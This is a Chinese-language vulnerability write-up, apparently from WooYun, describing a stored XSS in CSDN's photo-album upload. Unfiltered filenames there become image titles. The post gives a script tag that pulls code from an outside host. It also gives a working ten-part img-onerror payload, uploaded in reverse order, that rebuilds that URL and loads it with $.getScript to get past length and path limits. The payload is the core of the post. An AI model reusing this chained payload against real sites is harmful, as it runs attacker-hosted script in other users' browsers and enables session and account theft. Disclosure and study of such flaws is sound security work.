WooYun.org

话说我继续在CSDN空间挖洞，然后看到了“相册”这一功能，有没有什么漏洞呢？
0、试着上传了一张图片。

1、在http://my.csdn.net/my/album/upload中上传一张图片，抓包，把filename的后缀改为.php，但是失败了；

2、回到相册首页（http://my.csdn.net/my/album）进入相册，突然发现图片的标题和去掉扩展名的filename一模一样。

3、这样会导致xss吗？把filename改成<nyan>.gif试试，发现并没有被过滤。

4、赶紧的上个<script src=//mikuxss.sinaapp.com/12CmMi></script>……等等？标题怎么变成了script>？

5、经多次测试，服务器貌似使用了basename()之类的函数，只会输出最后一个斜线后的内容，而且有长度限制，超出限制的话请求会被拒绝。
6、构造N条语句均失败后，回到相册，看了看源码，这些输出非常有规律，很整齐；

7、于是把一句代码分割为10份，倒序上传：
<img src=1 onerror="mkx='http:'">
<img src=1 onerror="ac=String.fromCharCode">
<img src=1 onerror="mkx+=ac(47)+ac(47)">
<img src=1 onerror="mkx+='mikuxss'">
<img src=1 onerror="mkx+='.sinaapp'">
<img src=1 onerror="mkx+='.com'">
<img src=1 onerror="mkx+=ac(47)">
<img src=1 onerror="mkx+='12CmMi'">
<img src=1 onerror="ac=$.getScript">
<img src=1 onerror="ac(mkx)">
8、效果图（http://my.csdn.net/u011311506/album/show/179805）

（注：为防止危害，mikuxss.sinaapp.com/12CmMi已无法使用）
（那个，图是测试用的，这个洞和V家没有关系。。。）